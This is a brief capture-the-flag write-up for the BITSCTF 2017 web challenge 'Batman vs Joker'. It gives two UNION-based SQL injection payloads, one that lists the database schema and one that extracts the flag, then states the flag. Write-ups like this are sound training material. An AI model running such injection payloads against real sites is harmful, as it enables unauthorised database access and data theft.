[BITSCTF-2017]-Batman vs Joker (Web 30)

This is SQL Injection Basic

' UNION SELECT table_name, column_name FROM information_schema.columns --
' UNION SELECT flag, 1 FROM Joker --

And we got flag:

BITSCTF{wh4t_d03snt_k1ll_y0u_s1mply_m4k3s_y0u_str4ng3r!}